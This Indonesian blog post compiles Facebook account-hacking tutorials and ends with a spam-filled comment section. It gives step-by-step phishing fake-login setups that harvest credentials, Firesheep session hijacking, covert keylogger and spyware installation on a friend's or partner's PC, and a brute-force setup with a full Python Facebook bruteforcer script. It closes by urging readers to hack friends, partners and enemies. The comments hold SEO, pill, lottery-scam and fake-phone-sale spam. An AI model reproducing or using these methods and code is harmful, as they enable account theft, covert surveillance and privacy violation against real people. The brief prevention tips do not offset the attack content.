Sumber: http://eltelu.blogspot.com/2012/09/cara-membuat-tab-menu-horizontal.html#ixzz2BUn2TQsY

Cari Misteri

Berbagai Cara Hack Facebook

http://1.bp.blogspot.com/_Nkm3Iv1TfU4/S9keKH3RkbI/AAAAAAAAAA4/6m7QRo0i-wA/s1600/hack.jpg

Cara Hack Facebook Dengan Metode Fake Login / Phising / Scam

PERTAMA:
Cara ini paling banyak digunakan dan terbukti efektif untuk meng-hack facebook, sebenarnya metodenya simple saja, kita tinggal membuat halaman login palsu yang kemudian kita upload ke sebuah website bahkan website gratisan pun bisa, kemudian kita pancing pengguna facebook agar menuju halaman login facebook palsu tersebut, cara memancing pengguna facebook pun ber macam macam bisa lewat email palsu yang mengatasnamakan facebook, link login palsu dan metode social engineering lainnya. Cara mencegah hack facebook dengan metode ini : sebelum anda login atau memasukkan username dan password anda pastikan bahwa alamat url tersebut benar, jika anda tidak yakin buka saja sebuah jendela baru, masukan alamat facebook (http://www.facebook.com) dan login melalui jendela tersebut. pastikan keaslian email yang mengatasnamakan facebook yang memancing anda agar login facebook yang masuk ke inbox anda, atau abaikan saja email tersebut.
KEDUA:
Facebook banyak sekali orang yang menggunakannya di indonesia hingga ribuanpun.
hampir-hampir saja facebook diharamkan.
Sesudah saya posting tentang cara login palsu di friendster, hari ini saya posting tentang cara membuat login palsu di facebook.
1. silahkan anda daftar di http://www.700megs.com
mengapa saya suruh anda daftar disana ?
di web hosting sana sangat gratis dan support php juga dari pada di ripway.com
bila tidak bisa terdaftar langsung saja masuk di :
http://www.700megs.com/register.jsp
2. setelah anda berhasil mendaftar di 700megs.com masuk ke FILE MANAGER…hapus file index.html.(akan ada di Cpanel masing2 nantinya)
3. oke, kita mulai praktek kita.
yang dibutuhkan adalah file index.php dan write.php sebagai inti fakelogin
silahkan download scriptnya dahulu disini atau di
http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.html

ukuran cuma 9kb.
4. setelah anda download. Disana ada dua file sebut saja index dan write
kedua-duanya silahkan anda upload di 700megs.com yang tadi anda sudah daftar.
5. lalu tes terlebih dahulu index.php yg telah kalian upload dan login dari situ,
klo berhasil.. akan ada file baru ;Password.txt [bertujuan sebagai tempat dimana userID dan password yang akan tertampung di facebook fakelogin kamu]
6, alright! selesai sampai di sini. . .
untuk penyebarannya silahkan dengan cara masing2…
disini saya cm kasih contoh satu untuk pengambilan secara paksa account2 facebook mania..
buka file index di www.700megs.com kalian..ambil URL nya.. [penting]
terus untuk pengguna firefox: buka tools>option>main
preview:
http://i410.photobucket.com/albums/pp190/eta_rrrrock/kidego1.jpg
disni fungsinya kita mengarahkan agar browser waktu pertama kali dibuka langsung mengarah ke file kita tadi. memungkinkan hasil buruan kalian lebih banyak nantinya.
boleh di sebar ke komputer temen/di warnet2 kesayangan.
atau..
bisa juga menyebarkan dengan cara seperti ini
http://i410.photobucket.com/albums/pp190/eta_rrrrock/32.jpg
kamu buat account baru,di yahoo,gmail,ato sejenisnya
dengan nick Facebook@ or something like that.
diatas cm contoh…silahkan kamu buat seni sendiri
enjoy..
mudahkan ??
semoga berhasil . . ..
KETIGA:
Yang paling penting siapin dulu web hosting buat naruh file fake login bisa yang gratis atau bayar terserah kalian pilih yg mana.,.,.,.,.,.,
1. download dan extract file index.html download dulu disini
2. download dan extract file logs.php download dulu disini
3. download dan extract file log.txt download dulu disini
Password : Flow
dah disiapin belum web hostingnya? ql belum aku saran mending pakek ripway.
nah kalau sudah registrasi, kalian upload dech file file yang kalian extract tadi.,.,.,.,.
pengertian:
- index.html : Halaman utama login palsu, alamat ini yang kalian sebar ke target.
Ex: http://h1.ripway.com/nama_kalian/index.html
- logs.php : Berfungsi untuk mengirimkam hasil hack dari index.html ke logs.txt
- logs.txt : Berfungsi untuk menampung hasil jerih payah kita
Ex: Email + Password Facebook.
sebarin dech alamat Fake Login kita tadi (index.html),.,.,.,
tinggal tunggu orang yang terlalu ceroboh login pakek Fake login kita.
saran bagi facebook’er :
1) Perhatikan dengan benar link address websitenya. Contoh klo FB linknya: http://www.facebook.com
2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau
HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan
username dan password kita.
3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah.
Untuk Windows tampilan XP, hanya cukup klik ’start’ -> All Programs ->
Accessories -> Accessibility -> ‘On-Screen Keyboard’
Untuk Windows tampilan bukan XP, hanya cukup klik ’start’ -> Program Files
-> Accessories -> Accessibility -> ‘On-Screen Keyboard’
4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak
“Remember me” pada saat login, karena hal itu dapat menyimpan username
dan password di komputer tersebut. Kecuali memakai komputer pribadi.
5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang. bila terlanjur cepat ganti password kalian,.,.,.,.

Cara Hack Facebook Dengan Network Sniffing

PERTAMA:
Bagi anda pengguna facebook yang menggunakan koneksi internet yang juga digunakan banyak orang seperti warnet atau koneksi internet di kampus atau tempat umum atau hotspot, apalagi yang gratisan harap berhati-hati. cara hack facebook dengan metode ini cukup mudah, berbekal software packet sniffer yang sangat mudah di download dan digunakan untuk memantau dan menyimpan paket lalu lintas jaringan, seseorang bisa dengan mudah membobol akun facebook dengan memanfaatkan paket data yang tersimpan tadi. cara menghindari agar akun facebook anda tidak kena hack dengan cara ini adalah dengan berhati-hati saat mengakses facebook, pastikan warnet atau hotspot area yang anda gunakan benar-benar aman.
KEDUA:
Cukup mudah untuk hacking facebook account saat ini, kmu dapat menggunakan firefox addon freesheep, yaitu sebuah addon Firefox yang mampu mencuri sesi cookie dari Facebook, Twitter dan account lainnya pada Web 2.0 yang tidak terenkripsi jaringan nirkabel terbuka.
cara menggunakanya sebagai berikut:
1. Download .xpi file di http://codebutler.github.com/firesheep/
2. install file .xpi tersebut
3. Install WinPcap, download di www.winpcap.org
4. jika instlasi firesheep dan wincap sudah selesai, buka firefox, klik menu tools > addons >Firesheep
5. klik preferences icon dan pilihi kartu interface jaringan pc / wireless card
6. klik  “Start Capturing”
7. tunggu beberapa saat, jika ada pengguna wireless yang mengakses website facebook maka firesheep akan siap menghack cookies nya.
nah gimana cara mencegah pencurian password dengan firesheep ini?
kamu dapat menggunakan software ForceTLS, download di https://addons.mozilla.org/en-US/firefox/addon/force-tls/
KETIGA:
Bismillah,
pada postingan kali ini akan membahas tentang bagaimana cara melakukan sniffing paket data situs jejaring facebook yang keluar masuk dari perangkat komputer yang digunakan untuk mengakses situs jejaring sosial tersebut. postingan ini berisi jawaban dari tugas yang diberikan pada mata kuliah Keamanan Informasi dengan soal sebagai berikut:
Anda diminta untuk menggunakan program sniffer (penyadap) seperti wireshark, tcpdump, atau sejenisnya untuk melakukan salah satu dari hal di bawah ini:
  1. mengukur jumlah data yang digunakan untuk membuka satu sesi gmail atau facebook;
  2. memantau serangan dari port scanning yang dilakukan dengan menggunakan program nmap.
Untuk yang (1) yang disebut satu sesi adalah login, membaca sebuah email (atau menulis sebuah email), kemudian logout. Jangan lupa program sniffer diset agar *semua* data ditangkap. Biasanya default dari program sniffer hanya menangkap header saja. Tujuan utamanya adalah untuk menghitung jumlah data yang ditangkap.
Untuk (2) tujuannya adalah untuk melihat pola “serangan” port scanning yang dilakukan oleh nmap. Apakah dia melakukan scanning dengan menguji port secara berurutan?
langsung saja menuju langkah-langkah yang dilakukan untuk melakukan sniffing paket data ini:
  1. pertama-tama buka aplikasi wireshark :)
  2. kedua, pilih menu Capture kemudian submenu Interfaces, atau bisa juga dengan jalan pintas menekan tombol Ctrl+I
  3. pilih interface yang ingin anda sadap paket datanya, disarankan koneksi yang dipilih adalah koneksi yang menggunakan kabel bukan koneksi yang nirkabel maupun koneksi dengan modem USB atau sejenisnya. Pilih menu Option pada interface yang ingin Anda sadap paket datanya.
  4. pada bagian “Capture filter” masukkan sebagai berikut(ganti alamat.ip.komputer.anda dengan alamat IP komputer yang digunakan untuk melakukan penyadapan paket data)
    host www.facebook.com and host alamat.ip.komputer.anda
  5. Klik start, maka proses penyadapan akan segera dimulai
  6. Jika ingin menyudahi proses penyadapan, klik tombol stop atau dengan menekan jalan pintas Ctrl+e
  7. Untuk mengetahui statistik paket yang berhasil disadap, cukup dengan memilih menu Statistic kemudian submenu Summary, maka akan tampil hasil seperti contoh berikut:
    hasil statistik sniffing paket data facebook
Pada data yang saya sadap dengan menggunakan wireshark ini paket data dari facebook cukup kecil (56948 bytes) hal ini mungkin dikarenakan metoda caching yang ada pada browser yang saya gunakan untuk membuka facebook masih menyimpan data-data yang diperlukan sehingga data cukup kecil.
sekian postingan kali ini.

Cara Hack Facebook Dengan Keylogger

PERTAMA:
Kembali lagi bagi anda yang menggunakan akses internet dari warnet atau hotspot dan mungkin juga di kampus atau di kantor harap berhati-hati. cara hack facebook dengan metode ini juga cukup mudah, tinggal pasang software keylogger yang berfungsi untuk merekam aktifitas penggunaan keyboard dan kemudian menggunakan data tersebut untuk mendapatkan username dan password facebook. seseorang bisa saja memasang software keylogger ke laptop atau pc anda atau menyebar trojan kedalam komputer di dalam sebuah jaringan komputer yang tidak aman. cara mencegahnya : pastikan antivirus pada komputer anda selalu up to date.
KEDUA:
Hai facebook’er! Tutorial facebook kali ini akan menjelaskan cara hack facebook dengan keylogger. Cara’nya gimana? Keylogger itu apa? Keylogger merupakan software yang berfungsi untuk memonitoring kegiatan PC dengan me’record / merekam kegiatan keyboard. Berikut akan dijelasin cara penggunaan’nya. AMPUH! Mau ?
Bagi facebook’er yang belum mempunyai keylogger, bisa download secara gratis disini. Sebenarnya software keylogger itu macam-macam namanya. Yang krisna gunakan yaitu keylogger yang bernama DOUGLAS 1.1.
Sebelum beraksi, pastikan dulu korbannya siapa. apakah PC rumah, PC Temen, PC warnet, PC kantor, atau mungkin PC Pacar/Istri … hahahaha
Kalau sudah pasti, sekarang krisna jelasin dah cara penggunaan’nya.
1. Setelah di download, jangan lupa extract file tersebut. OK ! Setelah file download tersebut di extract, akan ada 2 folder : Folder DOUGLAS_EN dan Folder DOUGLAS_ES .
2. Hapus aja Folder DOUGLAS_ES, gag penting !!! tanya kenapa ? karena pake bahasa spanyol … hehehe, yang kita gunakan yaitu Folder DOUGLAS_EN, karena menggunakan bahasa Inggris. hihihi …
3. Langkah selanjutnya yaitu buka folder DOUGLAS_EN. Di dalam pasti ada 6 File dan 1 Folder DATA. iya to ?? hohoho
4. Double klik pada file install.exe . Nanti pada proses penginstalan, anda akan diminta memasukan password. Isilah password tersebut, terserah tapi yang mudah di ingat !!
5. Kalau proses penginstalan sudah selesai, terus ???
Nah, santai !!! mendingan sekarang anda bikin kopi + beli mendoan terlebih dahulu. Untuk selanjutnya mudah kok ! hahahaha
Habiz buat kopi + beli mendoan, kita ngapain ??? tidur aja … hahaha
Pastikan keylogger sudah terinstal, untuk menggunakan keylogger tinggal tekan tombol CTRL+ALT+SHIFT+F9 pada keyboard anda …
DOUGLAS 1.1
Untuk melihat informasi yang sudah di rekam oleh keylogger, anda pilih READ INFORMATION. Terus masukkan password yang sama dengan password yang anda masukkan waktu proses penginstalan.
Nah, Selese dah !!! Mudah to ???
Terus kalau di dalamnya kosong / tidak ada informasi apa-apa, itu kenapa ?? Itu disebabkan karena tidak adanya aktifitas. Maksud aktifitas disini yaitu Penggunan PC tersebut.
Contoh : Misal anda sedang facebookan, coba anda logout dari Facebook anda. Pastikan keylogger telah terinstal Di PC tersebut, terus coba anda login kembali dengan memasukkan alamat email dan password facebook anda. Lalu buka keylogger anda dengan menekan tombol CTRL+ALT+SHIFT+F9 … Kemudian pilih READ INFORMATION, lalu masukkan password keylogger anda. Hasilnya apa ??? anda sendiri yang tahu..
Selamat mencoba
KETIGA:
SniperSpy adalah Password Hacking software Remote yang dikombinasikan dengan Remote Install dan Remote Viewing feature. Setelah diinstal pada PC remote, Anda hanya perlu login ke account SniperSpy. Anda secara pribadi dapat melihat aktivitas log dari PC remote! Ini berarti bahwa Anda dapat melihat log dari PC remote dari mana saja di dunia selama Anda memiliki akses internet.
Apakah Anda ingin Spy pada PC Remote? SniperSpy memungkinkan Anda untuk jarak jauh mata-mata setiap PC. Ini adalah satu-satunya perangkat lunak mata-mata remote PC dengan panel kontrol yang AMAN.
Remote PC software Spy juga menyimpan screenshot bersama dengan teks log chatting, website, penekanan tombol dalam bahasa dan banyak lagi. Remotely, melihat aktivitas anak Anda, karyawan atau siapapun menggunakan PC jauh dari Anda. Termasuk LIVE admin perintah dan kontrol.
Fitur SniperSpy :
1. Adalah perangkat lunak mata-mata SniperSpy deployable
2. Gaib Stealth Mode Option. Bekerja dalam mode siluman lengkap. Tidak terdeteksi
3. Log Semua keystrokes
4. Records setiap Password (Email, Login, Instant Messenger dll)
5. Remote Monitor Seluruh Percakapan IM sehingga Anda bisa memata-matai kegiatan IM
6. Menangkap format .jpg ukuran penuh gambar dari jendela aktif
7. Real Time Screen Viewer
8. Remote reboot atau shutdown PC atau memilih untuk logoff pengguna Windows saat ini
9. Lengkap, bypass Firewall apapun

Cara Hack Facebook Dengan Metode Bruteforce

PERTAMA:
Cara hack facebook dengan metode ini adalah cara paling bodoh untuk membobol facebook dan biasanya paling terakhir digunakan, karena membutuhkan waktu yang tidak singkat. metode hacking facebook dengan cara ini adalah dengan menggunakan software bruteforce untuk menebak-nebak password facebook sebuah akun dari sebuah file dictionary / kamus atau juga character generator. cara mencegah hack facebook dengan metode ini adalah dengan melindungi alamat email yang anda gunakan untuk login facebook, caranya bisa bermacam-macam, anda bisa memisah antara email untuk umum dan email untuk login facebook dan tidak menampilkannya di halam profil facebook anda.
KEDUA:
Postingan tentang hacking facebook ini gue copas aja dari situs jasakom.com :
Facebook, ? iya sapa yg tidak kenal dengan situs jejaring sosial ini. Ga punya account tetapi setidaknya pernah dengar nama ini bukan ).
Jejaring Sosial ini mungkin salah satu fenomena di beberapa tahun belakangan ini setelah pendahulunya friendster. Nah sebagai situs pertemanan, situs jejaring sosial ini tidak luput dari ke isengan tangan2 jahil, motifnya pun beragam, mulai dari isengin pemiliknya, revenge, sakit hati, dan yg paling parah adalah karena dengan motif buat nyari CHIPS POKER (nah lo, ngaku aja lo pada )
Implementasi Facebook Hacking Dengan Brute Force
Berbagai teknik telah banyak beredar di kalangan underground, teknik nya pun beragam, mulai dari teknik phising (fake login ), maupun keylogger hanya dengan tujuan untuk mendapatkan account pribadi targetnya.
ok, cukup basa basinya rel…..to the point aja deh
sebelumnya kita musti bikin persiapan dolo, ibarat mo perang senjata harus lengkap ….
yg musti disiapin sebagai berikut
1. Musti punya server atau hosting (gratis/ bayar) buat upload and nyimpen script 2 berikut.
Nah, file itu adalah file utama yg harus disimpan ke dalam hostingan
2. Buat Dictionary Attack bisa qmu bikin tambah dan edit sendiri dari wordlist Dictionary ataw mungkin bisa cari yg lebih lengkap.
OK, persiapan telah selesai….saatnya ke medan perang……ga deng, maksudnya kita akan melakukan testing.
disini saya asumsikan lo pada udah punya hosting buat tempat naroh file-file tadi.
klo ga tau cara bikin hosting silahkan tanya ke google yah )
1.pada source code Facebook Dictionary attacknya kita edit dolo sebelom di upload
set_time_limit(0);
kita ubah time limitnya menjadi gede misalnya 500 dan ini dalam hitungan detik hingga code itu menjadi
set_time_limit(500);
2.
$username =”brute@force.org”;
// username korban misalnya target@bego.com hingga pada code menjadi
$username =”target@bego.com”;
3.
$dictionary =”dictionary.txt”;
adalah tempat dictionary attack kita. biasanya diletakkan dalam satu directory
Setelah Semuanya di Edit, upload ke Hostingan yg kamu punya, misalkan saya punya Hosting (orang) yg saya pakai untuk contoh ini saya upload ke dalam satu directory bernama fb.
Nah setelah kedua file tersebut sukses di upload dalam 1 direktory

Facebook HAcking

setelah sukses, skr tinggal eksekusi tuh via eb address.
misalkan lo nyimpen di direktory /home/xxx.com/images/ maka eksekusi aja di http://xxx.com/images/
jika di eksekusi maka script akan mencoba membruteforce account milik target lo.
Bruteforce Target

Jika dah selesai , maka log hasil bruteforce tadi akan tersimpan dengan nama cookie.txt. pada direktory yg sama . silahkan di analisa hasilnya….
And last word, thanks for you attention if u read a simple tutorial.

KETIGA:

FbBruteforce
Silakan download FbBruteforce:
Berikut Codenya:

#!/usr/bin/python
# This is facebook bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname : facebookbruteforcer.py
# Programmer : Gunslinger_
# Version : 1.0
# Date : Tue Jul 27 13:24:44 WIT 2010
# Special thanks to mywisdom to inspire me ;)
import re
import os
import sys
import random
import warnings
import time
try:
import mechanize
except ImportError:
print "[*] Please install mechanize python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
import cookielib
except ImportError:
print "[*] Please install cookielib python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
# define variable
__programmer__ = "gunslinger_ "
__version__ = "1.0"
verbose = False
useproxy = False
usepassproxy = False
log = 'fbbruteforcer.log'
file = open(log, "a")
success = 'http://www.facebook.com/?sk=messages&ref=mb'
fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
]
facebook = '''
__ _ _
/ _| | | | |
| |_ __ _ ___ ___| |__ ___ ___ | | __
| _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
| || (_| | (_| __/ |_) | (_) | (_) | <
|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
bruteforcer...
Programmer : %s
Version : %s''' % (__programmer__, __version__)
option = '''
Usage : %s [options]
Option : -u, --username | User for bruteforcing
-w, --wordlist | Wordlist used for bruteforcing
-v, --verbose | Set %s will be verbose
-p, --proxy | Set http proxy will be use
-k, --usernameproxy | Set username at proxy will be use
-i, --passproxy | Set password at proxy will be use
-l, --log | Specify output filename (default : fbbruteforcer.log)
-h, --help | Print this help
Example : %s -u brad@hackme.com -w wordlist.txt"
P.S : add "&" to run in the background
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme = '''
Usage : %s [option]
-h or --help for get help
''' % sys.argv[0]
def helpme():
print facebook
print option
file.write(facebook)
file.write(option)
sys.exit(1)
def helpmee():
print facebook
print hme
file.write(facebook)
file.write(hme)
sys.exit(1)
for arg in sys.argv:
try:
if arg.lower() == '-u' or arg.lower() == '--user':
username = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-l' or arg.lower() == '--log':
log = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-p' or arg.lower() == '--proxy':
useproxy = True
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-k' or arg.lower() == '--userproxy':
usepassproxy = True
usw = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-i' or arg.lower() == '--passproxy':
usepassproxy = True
usp = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-v' or arg.lower() == '--verbose':
verbose = True
elif arg.lower() == '-h' or arg.lower() == '--help':
helpme()
elif len(sys.argv) <= 1:
helpmee()
except IOError:
helpme()
except NameError:
helpme()
except IndexError:
helpme()
def bruteforce(word):
try:
sys.stdout.write("\r[*] Trying %s... " % word)
file.write("[*] Trying %s\n" % word)
sys.stdout.flush()
br.addheaders = [('User-agent', random.choice(ouruseragent))]
opensite = br.open(fblogin)
br.select_form(nr=0)
br.form['email'] = username
br.form['pass'] = word
br.submit()
response = br.response().read()
if verbose:
print response
if success in response:
print "\n\n[*] Logging in success..."
print "[*] Username : %s" % (username)
print "[*] Password : %s\n" % (word)
file.write("\n[*] Logging in success...")
file.write("\n[*] Username : %s" % (username))
file.write("\n[*] Password : %s\n\n" % (word))
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
except mechanize._mechanize.FormNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
except mechanize._form.ControlNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
def releaser():
global word
for word in words:
bruteforce(word.replace("\n",""))
def main():
global br
global words
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_redirects(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
if useproxy:
br.set_proxies({"http": proxy})
if usepassproxy:
br.add_proxy_password(usw, usp)
if verbose:
br.set_debug_http(True)
br.set_debug_redirects(True)
br.set_debug_redirects(True)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except IOError:
print "\n[*] Error: Check your wordlist path\n"
file.write("\n[*] Error: Check your wordlist path\n")
sys.exit(1)
except NameError:
helpme()
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
print facebook
print "\n[*] Starting attack at %s" % time.strftime("%X")
print "[*] Account for bruteforcing %s" % (username)
print "[*] Loaded :",len(words),"words"
print "[*] Bruteforcing, please wait..."
file.write(facebook)
file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
file.write("\n[*] Account for bruteforcing %s" % (username))
file.write("\n[*] Loaded : %d words" % int(len(words)))
file.write("\n[*] Bruteforcing, please wait...\n")
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
releaser()
bruteforce(word)
except NameError:
helpme()


if __name__ == '__main__':
main()
Nah, dari beberapa cara hack facebook dan pencegahannya di atas semoga anda lebih berhati-hati, untuk lebih detail mengenai tiap metode atau cara yang saya sebutkan di atas akan saya bahas di postingan saya yang selanjutnya, semoga bermanfaat dan semoga akun facebook anda tidak kena hack :)
Selamat berekperimen untuk mencoba hack facebook teman, hack facebook pacar, hack facebook musuh, hack akun facebook, cara hack facebook, cara ngehack facebook, cara hack password facebook, cara hack account facebook, crack facebook. cara membobol password facebook, cara menjebol password facebook, cara membobol facebook, cara mengetahui account facebook, cara mengetahui password facebook, cara menghack facebook, tutorial hack facebook, tutorial hacking facebook.
Source: Berbagi artikel di Google! [dhani, gunslinger,*.blogspot.com,*.wordpress.com,dll]
http://www.binushacker.net/berbagai-cara-hack-facebook.html

220 comments:

«Paling tua   ‹Lebih tua   201 – 220 dari 220   Lebih baru›   Terbaru»
Anonim mengatakan...

Hi. I noticed your website title, "Blogger: In My Mystery" doesn't really reflect the content of your web site. When composing your site title, do you believe it's best to
write it for SEO or for your readers? This is something I've been struggling with mainly because I want great search rankings but at the same time I want the best quality for my site visitors.

Here is my blog post; affordable seo firm

Anonim mengatakan...

As you are now in full fited out to buy the
proper penis lozenge today and know how to get a penis heart sizing, the preferably
you get started on your not do more than than is recommended.
It is awful how many get it up because I was embarrassed that my lack of
size of it would not please the woman I was with.



Visit my homepage www.penisadvantage911.com/

Anonim mengatakan...

Access Vip Account, http://www.oron.cz/ftp.php
Join today and all the best kinds of from our server!

EASY, FAST, CHEAP! AND IT’S JUST FOR A SMALL PRICE!

Free FTP Access, Vip Account, Download Music without Any Restrictions download Electro House For Djs Music Download, mixtapes, mixes, promotion Club Mixes FTP Access, Vip Account, Download Music
without
Any Restrictions. Latest good Top club songs Electro House 2013.
DJ Playlist For 2013 Download Club Scene DJ's, Ok Let's Party!
Top Dance Club DJ FTP Access, Vip Account,
Download Music without Any Restrictions A DJ Set Of Top Club
Songs 2013 Download here ElectroHouse.ucoz.com Welcome to Best our Music FTP server for Djs, Exclusive Music Source
Dj Private FTP 0-Day Music 2013
http://www.uploaded.lt
http://www.0daymusic.eu
http://www.0dayvinyls.org
http://2013.0daymusic.org
http://www.filestube.eu
http://www.filestube.lt
http://www.mediafire.lt
http://www.oron.at
http://www.oron.ee
http://www.oron.lt
http://www.oron.se

Anonim mengatakan...

You really make it aρpeаr reаlly easy along with youг рresentatіоn hoωever I to fіnd thiѕ matter
to bе really onе thing which I think I
might by no mеans understand. It kind of feels tοo cоmplicated anԁ extremely
broaԁ for me. I am taκing a look forwаrd
fоr youг subsequent publish, Ι will try to get
the holԁ of it!

Look into my web ρage - raspberry ketone side effects

Anonim mengatakan...

In fact when somеone ԁoеsn't understand after that its up to other viewers that they will assist, so here it takes place.

My page: green coffee extract capsules (twitter.com)

Anonim mengatakan...

I've loaded your website in 3 different browsers and I must say your blog loads a lot faster then most. Would you mind contacting me the company name of your web hosting company? My personal email is: cheri.farley@gmail.com. I'll even sign up through your
own affiliate link if you would like. Thank you

Feel free to surf to my web blog niche link building
[]

Anonim mengatakan...

, of course, truth bottom of the NuWave is without question material,
and needs for being safeguarded because of completely, dish washer safe, ambigu intention fluid
watching the baking pot. In many instances, goods
reheated extremely stove becomes at this time being soggy.
Feng Shui will allow any examine all their fortune dependent upon the Several Truly Causes.



Also visit my homepage - toaster ovens

Anonim mengatakan...

The ԁiѕаbling effects of anxіetysCan you
just imagіne how you wοulԁ feel after a good exercise ωοrkout.

In short, the tгіple ωarmег mегidiаn has beсome ovегeneгgized.
The bad news is thаt thеre is no real danger luгking nеагby.
Тherе is treаtment аcquirable for those οf uѕ who are worκіng on mindfulness are not awаre of
it. And then thеre aге thοse who stop shoρpіng аltogether
anԁ relу on a friend or а professional counѕеlor.


mу web рage; anxiety attacks

Anonim mengatakan...

Please let me know if you're looking for a author for your blog. You have some really good articles and I feel I would be a good asset. If you ever want to take some of the load off, I'd absolutely love to
write some articles for your blog in exchange for a link back to mine.
Please send me an email if interested. Regards!

Here is my web site :: contextual link building

Anonim mengatakan...

Wonderful blog! I found it while surfing around on Yahoo News.
Do you have any suggestions on how to get listed in
Yahoo News? I've been trying for a while but I never seem to get there! Many thanks

my blog post - small business seo services

A-Sindo mengatakan...

Thanks ...

ferdy irawan mengatakan...

ASSALAMU ALAIKUM WR-WB KAMI SEKELUARGA MENGUCAPKAN BANYAK TERIMAH KASIH ATAS BANTUAN AKI,JATI LUHUR KARNA NOMOR GHOIB/RITUAL JITU YANG AKI,BERIKAN 4D (8301) BENAR BENAR TEMBUS 100% DAN SAYA MEMENANGKAN 380 JUTA ALHAMDULILLAH, SAYA BISA MEMBELI RUMAH DAN MOBIL WALAUPUN SAYA CUMA PNS GOLONGAN 1B.INI ADALAH KISAH NYATA DARI SAYA.JIKA ANDA PENUH KEPERCAYAAN DAN KEYAKINAN SILAHKAN ANDA HUBUNGI LANGSUNG AKI, JATI LUHUR KARENA APAPUN KEADAAN ANDA JANGAN PERNAH BERPUTUS ASAH KALAU SUDAH WAKTUNYA TUHAN PASTI KASIH JALAN AMIN.

JIKA ANDA BUTUH ANGKA RITUAL 2D 3D 4D DI JAMIN 100% JEBOL ATAU PUNYA MUSTIKA GHAIB INGIN DIPAKAI MENARIK UANG BILAH BERMINAT HUB KI JATI LUHUR DI NMR +62852-2948-7855 ATAU KUNJUNGI WEPSITE (KLIK) www.uangghaib.webs.com SAYA SUDAH BUKTIKAN 3X THNKS ROOMX SOBAT

NABILA SHOP mengatakan...

Produk dijamin asli orginal.Dapatkan harga promo Nabila Shop : Barang yang Kami Tawarkan Semuanya Barang ASLI ORGINAL Ada Garansi Resmi Distributor dan Garansi TAM 2 bebas resiko bebas penipuan.
Semua Produk Kami Baru dan Msh Tersegel dLm BOX_nya.
BERMINAT HUB-SMS 085-757-299-675 ATAU KLIK WEBSET RESMI KAMI http://nabilashop77.blogspot.com/.

Ready Stock!
Samsung Galaxy S4 Mini Rp.2,500.000
Ready Stock!
Apple iPhone 5 Rp.2,700.000
Ready Stock!
BlackBerry 9380 Orlando - Black.Rp.900.000,-
Ready Stock!
BlackBerry Curve 8520 Gemini.Rp.500.000,-
Ready Stock!
